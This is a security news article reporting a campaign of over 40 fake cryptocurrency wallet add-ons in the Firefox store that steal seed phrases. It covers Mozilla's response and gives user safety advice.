Researchers have discovered dozens of fake wallet Firefox add-ons are stealing sensitive credentials.

Dozens of fake wallet add-ons have recently flooded the official Firefox add-ons store, targeting cryptocurrency users by impersonating popular wallet brands and stealing sensitive credentials. Over 40 malicious extensions were discovered, posing as legitimate wallets from well-known providers such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero.

Key details about the campaign

Malicious Code & Data Theft: These fake extensions contain code that captures wallet credentials and seed phrases. Specifically, they monitor for input fields where users might enter sensitive information, filtering for strings longer than 30 characters—typical of wallet keys or mnemonic phrases. Once detected, the data is sent to servers controlled by attackers. The extensions are often clones of open-source versions of real wallets, but with added malicious logic. They also use tricks such as hiding error dialogs by setting their opacity to zero, preventing users from noticing suspicious activity.

Security researchers at Koi Security, who uncovered the campaign, found evidence suggesting the operation is run by a Russian-speaking threat group. Seed phrases are especially valuable because they allow full access to a user’s crypto wallet and can be used to transfer or drain funds instantly. Stolen assets are almost always unrecoverable.

Mozilla’s Response

Mozilla has implemented new security measures, including an automated risk profiling system and manual reviews, to detect and block malicious wallet extensions more quickly. However, the rapid appearance of dozens of these fake add-ons highlights the ongoing challenge and the need for users to remain vigilant.

User Recommendations

• Only install wallet extensions from official sources or the official website of the wallet provider.
• Double-check the legitimacy of any crypto-related extension, even if it appears in the official Firefox store.
• Be cautious of any extension requesting sensitive information such as seed phrases or private keys.